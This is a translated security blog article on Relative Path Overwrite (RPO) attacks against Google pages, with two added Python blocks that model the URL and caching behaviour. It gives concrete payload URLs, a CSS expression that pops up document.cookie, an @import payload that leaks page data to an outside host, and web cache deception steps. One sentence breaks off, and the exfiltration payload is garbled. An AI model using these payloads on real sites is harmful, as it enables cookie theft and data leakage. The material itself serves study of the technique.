Hacking Book | Free Online Hacking Learning


A New Type of Web Attack Technique: the RPO Attack

Posted by chiappelli at 2020-03-06



An RPO (Relative Path Overwrite) attack depends on how the browser and the web server each interpret the same URL, and it exploits web caching technology and differences in server configuration.

Author: Li Yuhan

From: Anyun Technology

The example in this article attacks through CSS: it uses a relative-path stylesheet reference in the page to mislead the browser, so that the browser writes XSS code into the page.

1、 A first look at the RPO attack



Web page code:

<title>Google Toolbar API - Guide to Making Custom Buttons</title>

<link href="../../styles.css" rel="stylesheet" type="text/css"/>



JSP (servlet) path handling accepts path parameters: everything after a semicolon in a path segment is treated as a parameter, so a path such as path;/notpath is still resolved to the directory path.

The browser sends the URL as the user wrote it; the server percent-decodes it before resolving the path.

So if %2F can be used in place of "/",

the URL can be written as http://www.google.com/tools/toolbar/buttons/apis%2fhowto_guide.html

and the page is returned normally.

The server receives /tools/toolbar/buttons/apis/howto_guide.html

The browser receives /tools/toolbar/buttons/apis%2fhowto_guide.html

The stylesheet imported by the page becomes /tools/toolbar/buttons/../styles.css

The browser believes the base directory of styles.css is /tools/toolbar/buttons, not /tools/toolbar/buttons/apis,

so the ../ in the stylesheet path climbs one level higher than the page author intended.

That leaves more room to work with.

If we insert a fake directory segment named fake, we can make the page import a nonexistent /tools/fake/styles.css:

The path the server receives is /tools/fake/../toolbar/buttons/apis/howto_guide.html

The path the browser receives is /tools/fake/..%2ftoolbar/buttons/apis%2fhowto_guide.html

The imported stylesheet is /tools/fake/..%2ftoolbar/buttons/../styles.css

The browser treats fake/ and ..%2ftoolbar/ as two different directories.

In this way, any resource under the Google domain can be imported as a stylesheet.
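The two views of the URL described above, modelled in Python as an added example (not code from the original article): the server percent-decodes the path before resolving it, while the browser resolves the page's relative href against the URL exactly as typed. The URLs are the ones the text uses; has_encoded_delimiter is an added defensive check, not something the text proposes.

```python
"""Model of the two URL views an RPO attack plays against each other.

Added example, not code from the original article. The server decodes %2F into a
directory separator before resolving '..'; the browser resolves the relative href
against the URL as typed, where %2F is an opaque character inside one segment.
"""
import posixpath
from urllib.parse import unquote, urljoin, urlsplit

# Relative stylesheet reference from the example page's <link> tag.
STYLESHEET_HREF = "../../styles.css"


def server_view(url: str) -> str:
    """Path the server actually serves: decode, then collapse '..' segments."""
    return posixpath.normpath(unquote(urlsplit(url).path))


def browser_view(url: str, href: str = STYLESHEET_HREF) -> str:
    """Path the browser requests for a relative href on the page at `url`."""
    return urlsplit(urljoin(url, href)).path


def intended_view(url: str, href: str = STYLESHEET_HREF) -> str:
    """Where the page author expected the href to land: resolved against the
    directory the server believes the page lives in."""
    parts = urlsplit(url)
    canonical = f"{parts.scheme}://{parts.netloc}{server_view(url)}"
    return urlsplit(urljoin(canonical, href)).path


def has_encoded_delimiter(url: str) -> bool:
    """Defensive check (assumed, not from the text): flag any path segment whose
    %-escapes decode to '/', '?' or ';'. Legitimate links never need a delimiter
    encoded inside a segment, so such requests can be rejected or redirected to
    the canonical path, and the two views above can no longer diverge."""
    for segment in urlsplit(url).path.split("/"):
        decoded = unquote(segment)
        if decoded != segment and any(c in decoded for c in "/?;"):
            return True
    return False


if __name__ == "__main__":
    for u in ("http://www.google.com/tools/toolbar/buttons/apis%2fhowto_guide.html",
              "http://www.google.com/tools/fake/..%2ftoolbar/buttons/apis%2fhowto_guide.html"):
        print(u)
        print("  server serves :", server_view(u))
        print("  author meant  :", intended_view(u))
        print("  browser loads :", browser_view(u))
        print("  suspicious?   :", has_encoded_delimiter(u))
```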

Next, find a page that reflects a URL parameter into its body.

For example: http://www.google.com/gadgets/directory?synd=toolbar&frontpage=1&q=%0A{}*{background:red}

The page source is: <div id="frontend directory page">

<font size="-1"><div class="resultNotFound"><p>Search <b>-

{}*{background:red}</b> did not match any gadgets

If http://www.google.com/tools/toolbar/buttons/gallery?foo=bar is automatically redirected to


So we can construct the payload directly.

The XSS code is written into the URL itself, because the stylesheet import has to carry the injection along with it.

The constructed payload is http://www.google.com/tools/toolbar%2fbuttons%3fq%3D%250A%257b%257d%257bbackground%253ared%257d/..%2F/apis/howto_guide.html

The request the server receives is /tools/toolbar/buttons/gallery?q=%0A{}*{background:red}/../apis/howto_guide.html

The request the browser receives is /tools/toolbar%2fbuttons%3fq%3D%250A%257b%257d%257bbackground%253ared%257d/..%2F/apis/howto_guide.html

The imported stylesheet is /tools/toolbar%2fbuttons%3fq%3D%250A%257b%257d%257bbackground%253ared%257d/..%2F/apis/../styles.css



The stylesheet is successfully imported into the page.

Going further, CSS-based XSS code can be imported, such as {xss:expression(alert(document.cookie))},

which pops up document.cookie.

Google's defence in depth sets the response header X-Content-Type-Options: nosniff, so the properties of the Google Toolbar custom-button page are not applied as a stylesheet, but IE9 only came to recognise this header later.

Before IE8 the header was not recognised at all.

Other browsers, such as Firefox and Chrome, ignore this header when loading data from the same domain.

2、 Further exploitation

CSS parsers are lenient towards any imported stylesheet:

any page under http://www.google.com/* can be imported and parsed as a stylesheet.

If a page contains private data and an injection point, CSS tricks can be used to steal that data.

Conditions:

1. The injection point must come before the private data.

2. Whitespace characters such as %0A, %0C and %0D must be allowed at the injection point.

3. The private data must not contain whitespace.

PayLoad:http://www.google.com/search?nord=1&q={}%[email protected]"//innerht.ml?

@import is an infrequently used rule and is easily overlooked by front-end developers. It imports a CSS file, and @import rules must precede all other CSS rules except @charset. Introducing CSS through @import can therefore bypass Google's defence in depth.

Our payload creates an import rule of the form @import "//innerht.ml..., which leaks information from the page; the leaked information can then be collected on the host that receives the import request.


3、 Exfiltration:

Web cache deception:

When the target site sits behind a caching server,

requesting a static file that does not actually exist, such as a CSS file, under the current page's URL causes the cache server to store the page, complete with the user's account details, as a static file, so that an attacker can then fetch the user's account data directly from the cache.

File suffixes that are commonly cached:

aif, aiff, au, avi, bin, bmp, cab, carb, cct, cdf, class, css, doc, dcr, dtd, gcf, gff, gif, grv, hdml, hqx, ico, ini, jpeg, jpg, js, mov, mp3, nc, pct, ppc, pws, swa, swf, txt, vbs, w32, wav, wbmp, wml, wmlc, wmls, wmlsc, xsd, zip
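The caching behaviour described in this section, modelled as an added example (not code from the original article): a suffix-only cache rule stores the account page under a bogus .css URL, while a rule that honours the origin's Cache-Control and Content-Type does not. The origin, the cache, the user "alice" and the /account/ path are constructed for the illustration.

```python
"""Suffix-based caching versus a cache rule that trusts the origin.

Added example, not code from the original article. The origin and cache are
constructed stand-ins for the target site and the caching server described
above; the two policy functions carry the point.
"""
import posixpath

# Some suffixes from the list above, with the MIME type a real static file carries.
STATIC_TYPES = {"css": "text/css", "js": "application/javascript",
                "gif": "image/gif", "jpg": "image/jpeg", "txt": "text/plain"}


def suffix_of(path):
    return posixpath.splitext(path)[1].lstrip(".").lower()


def origin(path, user):
    """Constructed origin: /account/<anything> renders the logged-in user's page."""
    if path.startswith("/account/") and user:
        return {"content-type": "text/html", "cache-control": "private, no-store",
                "body": f"<h1>Account</h1> user={user}"}
    return {"content-type": "text/html", "cache-control": "no-store",
            "body": "login required"}


def suffix_policy(path, resp):
    """Weak rule: cache whenever the URL ends in a 'static' suffix."""
    return suffix_of(path) in STATIC_TYPES


def strict_policy(path, resp):
    """Corrected rule: honour Cache-Control and require the origin's
    Content-Type to match what the suffix promises."""
    if "private" in resp["cache-control"] or "no-store" in resp["cache-control"]:
        return False
    return STATIC_TYPES.get(suffix_of(path)) == resp["content-type"]


def fetch(cache, policy, path, user):
    """Shared cache in front of the origin; returns the body the client sees."""
    if path not in cache:
        resp = origin(path, user)
        if not policy(path, resp):
            return resp["body"]
        cache[path] = resp
    return cache[path]["body"]


def leaked_to_anonymous(policy):
    """Victim 'alice' is lured to the bogus static URL; does a later anonymous
    request get her page back from the cache?"""
    cache, path = {}, "/account/settings/x.css"
    fetch(cache, policy, path, "alice")
    return "alice" in fetch(cache, policy, path, None)
```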